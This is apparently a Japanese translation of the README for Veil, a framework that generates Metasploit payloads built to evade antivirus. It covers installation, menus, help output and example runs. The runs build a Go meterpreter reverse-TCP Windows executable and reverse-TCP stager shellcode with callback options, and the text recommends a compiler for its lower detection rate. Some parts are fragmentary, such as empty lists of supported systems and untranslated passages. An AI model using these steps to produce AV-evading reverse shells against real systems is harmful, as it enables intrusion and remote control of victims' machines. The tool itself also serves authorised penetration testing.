
Veil 3.1.X(実行時にVeilのバージョン情報を確認してください)
Veil Logo
Veilは、一般的なアンチウイルスソリューションを回避するMetasploitペイロードを生成するために設計されたツールです。
Veilは現在@ChrisTruncerによってサポートされています。
以下のOSが正式にサポートされています:
以下のOSはVeilを実行できる可能性があります:
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
注:
sudo を付けるか、作業を開始する前にルートユーザーに切り替えてください。apt と異なる場合があります。また、システム自体またはローカルシステムでXサーバーが実行されている必要があります。sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent
このファイルは、Veilのすべての依存関係をインストールする役割を果たします。Windows側のすべてのWINE環境も含まれます。必要なLinuxパッケージとGoLang、さらにWindows用のPython、Ruby、AutoITをインストールします。さらに、環境に応じて ./config/update-config.py も実行します。
これには2つのオプションフラグ --force と --silent が含まれています:
--force ~ If something goes wrong, this will overwrite detecting any previous installs. Useful when there is a setup package update.
--silent ~ This will perform an unattended installation of everything, as it will automate all the steps, so there is no interaction for the user.
これは、./Veil.py --setup または ./config/setup.sh --force のいずれかで実行できます。
これにより、/etc/veil/settings.py の出力ファイルが生成されます。ほとんどの場合、再構築の必要はありませんが、場合によっては(Veilのメジャーアップデートなど)再構築を求められることがあります。
update-config.py を実行する前に、./config/ ディレクトリにいることが重要です。そうでない場合、/etc/veil/settings.py が正しくなくなり、Veilを起動すると次のように表示されます:
Main Menu
0 payloads loaded
慌てないでください。次のいずれかを実行してください:./Veil.py --config または cd ./config/; ./update-config.py。
注: Py2Exe を使用することがPyInstallerよりも推奨されています (検出率が低いため)。
Windowsコンピューターに手動でインストール(Veilのセットアップでは行われません):
Veilのメインメニュー:
$ ./Veil.py
===============================================================================
Veil | [Version]: 3.1.6
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Main Menu
2 tools loaded
Available Tools:
1) Evasion
2) Ordnance
Available Commands:
exit Completely exit Veil
info Information on a specific tool
list List available tools
options Show Veil configuration
update Update Veil
use Use a specific tool
Veil>:
ヘルプ
$ ./Veil.py --help
usage: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]
[--version] [--ip IP] [--port PORT] [--list-payloads]
[-p [PAYLOAD]] [-o OUTPUT-NAME]
[-c [OPTION=value [OPTION=value ...]]]
[--msfoptions [OPTION=value [OPTION=value ...]]] [--msfvenom ]
[--compiler pyinstaller] [--clean] [--ordnance-payload PAYLOAD]
[--list-encoders] [-e ENCODER] [-b \x00\x0a..] [--print-stats]
Veil is a framework containing multiple tools.
[*] Veil Options:
--list-tools List Veil's tools
-t TOOL, --tool TOOL Specify Veil tool to use (Evasion, Ordnance etc.)
--update Update the Veil framework
--setup Run the Veil framework setup file & regenerate the
configuration
--config Regenerate the Veil framework configuration file
--version Displays version and quits
[*] Callback Settings:
--ip IP, --domain IP IP address to connect back to
--port PORT Port number to connect to
[*] Payload Settings:
--list-payloads Lists all available payloads for that tool
[*] Veil-Evasion Options:
-p [PAYLOAD] Payload to generate
-o OUTPUT-NAME Output file base name for source and compiled binaries
-c [OPTION=value [OPTION=value ...]]
Custom payload module options
--msfoptions [OPTION=value [OPTION=value ...]]
Options for the specified metasploit payload
--msfvenom [] Metasploit shellcode to generate (e.g.
windows/meterpreter/reverse_tcp etc.)
--compiler pyinstaller
Compiler option for payload (currently only needed for
Python)
--clean Clean out payload folders
[*] Veil-Ordnance Shellcode Options:
--ordnance-payload PAYLOAD
Payload type (bind_tcp, rev_tcp, etc.)
[*] Veil-Ordnance Encoder Options:
--list-encoders Lists all available encoders
-e ENCODER, --encoder ENCODER
Name of shellcode encoder to use
-b \x00\x0a.., --bad-chars \x00\x0a..
Bad characters to avoid
--print-stats Print information about the encoded shellcode
$
Veil Evasion CLI
$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
runtime/internal/sys
runtime/internal/atomic
runtime
errors
internal/race
sync/atomic
math
sync
io
unicode/utf8
internal/syscall/windows/sysdll
unicode/utf16
syscall
strconv
reflect
encoding/binary
command-line-arguments
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[*] Language: go
[*] Payload Module: go/meterpreter/rev_tcp
[*] Executable written to: /var/lib/veil/output/compiled/payload.exe
[*] Source code written to: /var/lib/veil/output/source/payload.go
[*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc
$
$ file /var/lib/veil/output/compiled/payload.exe
/var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
$
Veil Ordnance CLI
$ ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 127.0.0.1 --port 4444
===============================================================================
Veil-Ordnance
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[*] Payload Name: Reverse TCP Stager (Stage 1)
[*] IP Address: 127.0.0.1
[*] Port: 4444
[*] Shellcode Size: 287